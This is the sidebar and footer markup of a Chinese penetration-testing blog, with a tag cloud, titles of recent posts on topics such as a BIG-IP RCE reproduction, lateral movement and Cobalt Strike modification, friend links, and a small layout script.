Strike</a> <a href="/tags/安全开发/" style="font-size: 12px;">安全开发</a> <a href="/tags/Ngrok/" style="font-size: 12px;">Ngrok</a> <a href="/tags/PowerShell/" style="font-size: 18px;">PowerShell</a> <a href="/tags/文件包含/" style="font-size: 12px;">文件包含</a> <a href="/tags/QCOW2/" style="font-size: 12px;">QCOW2</a> <a href="/tags/Vulnhub/" style="font-size: 12px;">Vulnhub</a> <a href="/tags/远程代码执行/" style="font-size: 18px;">远程代码执行</a> <a href="/tags/命令执行/" style="font-size: 12px;">命令执行</a> <a href="/tags/shell脚本/" style="font-size: 12px;">shell脚本</a> <a href="/tags/venom/" style="font-size: 12px;">venom</a> <a href="/tags/免杀/" style="font-size: 16px;">免杀</a> <a href="/tags/文件上传/" style="font-size: 12px;">文件上传</a> <a href="/tags/端口转发/" style="font-size: 12px;">端口转发</a> <a href="/tags/Covenant/" style="font-size: 12px;">Covenant</a> <a href="/tags/meterpreter/" style="font-size: 12px;">meterpreter</a> <a href="/tags/poc/" style="font-size: 12px;">poc</a> <a href="/tags/msfvenom/" style="font-size: 12px;">msfvenom</a> <a href="/tags/域信息收集/" style="font-size: 14px;">域信息收集</a> <a href="/tags/反序列化/" style="font-size: 12px;">反序列化</a></div></div><div class="widget"><div class="widget-title"> 最新文章</div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/07/06/CVE-2020-5902-BIG-IP-RCE-复现/">CVE-2020-5902(BIG-IP RCE)复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/07/03/域控制器/">域控制器</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/30/域内横向移动二/">域内横向移动二</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/27/域内横向移动一/">域内横向移动一</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/24/CobaltStrike二次开发环境准备/">CobaltStrike二次开发环境准备</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/15/权限提升分析及防御二/">权限提升分析及防御二</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/11/权限提升分析及防御一/">权限提升分析及防御一</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/08/IntelliJ-IDEA修改cobaltstrike/">IntelliJ-IDEA修改cobaltstrike</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/09/利用msf自带的route模块穿透目标内网/">利用msf自带的route模块穿透目标内网</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/07/使用Venom搭建二级代理/">使用Venom搭建二级代理</a></li></ul></div><div class="widget"><div class="widget-title"> 友情链接</div><ul class="links-list"><li class="links-list-item"><a href="https://timeshu.github.io/" title="Time" target="_blank">Time</a></li></ul><ul class="links-list"><li class="links-list-item"><a href="http://blog.leanote.com/snowming" title="Snowming" target="_blank">Snowming</a></li></ul><ul class="links-list"><li class="links-list-item"><a href="http://www.vkxss.top/" title="VK" target="_blank">VK</a></li></ul></div></div></div></div><div id="footer">© <a href="/." rel="nofollow">Guko's Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a> Theme<a target="_blank" href="https://github.com/7ye/maupassant-hexo"> Maupassant.</a></div><a id="back_to_top" href="javascript:void(0)" class="back_to_top"><span>△</span></a><script type="text/javascript" src="/js/totop.js?v=0.0.1"></script><link rel="stylesheet" href="/css/jquery.fancybox.css"><script type="text/javascript" src="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.pack.js"></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.1"></script><script>function auto_code_fit(){
  if($(".highlight").length != 0){
    var pc_width = $(".post-content").width();
    $(".highlight .code").find("pre").width((pc_width-70)+"px");
  }
}
window.onresize = function(){
  auto_code_fit();
}
auto_code_fit();</script></div></body>